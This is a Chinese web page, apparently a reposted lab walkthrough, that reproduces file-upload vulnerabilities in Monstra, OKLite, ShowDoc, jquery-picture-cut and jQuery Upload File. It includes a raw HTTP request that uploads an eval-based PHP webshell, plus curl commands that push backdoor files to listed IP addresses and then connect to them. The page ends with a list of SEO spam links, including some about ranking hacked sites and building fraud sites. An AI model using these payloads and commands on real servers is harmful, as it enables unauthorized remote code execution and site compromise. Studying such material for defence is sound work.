当前位置: 首页 > wzjs >正文

医疗网站被黑后可以做排名搜狗链接提交入口

wzjs 2025/8/18 11:39:01
医疗网站被黑后可以做排名,搜狗链接提交入口,辽宁省企业信息系统,成都app推广公司monstra 文件上传 (CVE-2020-13384) Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。 Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代…

monstra 文件上传 (CVE-2020-13384)

Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。 Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。

打开页面 安装好页面进行登录

登录后台 

上传文件  这里说能上传的特殊文件后缀是phar的后缀文件

上传成功后直接命令执行

oklite 文件上传 (CVE-2019-16131)

锟铻科技 OKLite是中国锟铻科技公司的一套基于PHP的企业建站内容管理系统(CMS)。 锟铻科技 OKLite v1.2.25版本中的framework/admin/modulec_control.php文件存在代码问题漏洞,该漏洞源于ZIP归档文件的.php文件可以写入到/data/cache/。攻击者可利用该漏洞上传任意文件。

登录后台 输入弱口令 进行一下操作 上传test.zip 里面存在有test.php后门


后门解析路径 /data/cache/test.php  进行连接 连接成功

showdoc 文件上传 (cnvd-2020-26585)

ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。 api_page存在任意文件上传.

打开界面

直接使用POC上传文件,直接上传成功

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: xx.xx.xx.xx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 265----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain<?php echo 'hello!!!';@eval($_GET['cmd'])?>
----------------------------921378126371623762173617--

使用命令681daa78559a9.php?cmd=phpinfo(); 查看phpinfo()

 jquery-picture-cut 任意文件上传 (CVE-2018-9208)

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

直接使用poc

curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@1.php" http://219.131.59.213:43188/jquery-picture-cut/src/php/upload.php

上传成功 并成功连接后门

jquery 文件上传 (CVE-2018-9207)

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file

打开页面

这里也直接用poc进行上传文件

curl -F "myfile=@1.php" "http://219.131.59.213:22267/jquery-upload-file/php/upload.php"

连接成功 

http://www.dtcms.com/wzjs/391844.html

相关文章:

  • 个人网页优秀作品河南郑州网站推广优化外包
  • 北京著名网站设计公司免费的h5制作网站模板
  • 08影院wordpress主题app排名优化公司
  • 企业手机网站建设市场分析站长之家素材网站
  • 做游戏代练的网站百度竞价什么意思
  • 江苏苏中建设集团股份有限公司网站seo研究中心怎么了
  • 网站建设微信公众号小程序app舆情分析报告范文
  • 家庭网络如何做网站服务器seo每日一帖
  • 色情网站怎么做网络广告策划流程有哪些?
  • 专做定制旅游网站有哪些你就知道
  • 河南省建设部省厅网站网络营销学什么内容
  • 提供常州网站建设福州百度快速优化排名
  • 衡水微信网站建设湖南网站设计
  • 网站建设人员构成什么是seo标题优化
  • 常宁网站开发整站关键词排名优化
  • 做调查问卷赚钱网站国外镇江推广公司
  • 做房产的网站排名整合营销传播成功案例
  • 视频网站怎么建疫情最新数据消息
  • 做诈骗网站网站推广优化是什么意思
  • 重庆推广网站排名宁波seo搜索优化费用
  • 人大家网站建设seo优化运营
  • 大连在哪儿杭州seo公司服务
  • 有哪些网站是cms专业培训心得体会
  • 深圳做网站排名价格建筑设计网站
  • 园洲做网站公司网络推广合同
  • 2003 防火墙 限制网站长沙优化网站推广
  • php会了 怎么做网站苏州seo网站管理
  • 做yahoo代拍网站公司网络营销试卷及答案
  • 遂宁市网站建设2345网址导航用户中心
  • win10做的网站其他电脑访问排名优化seo公司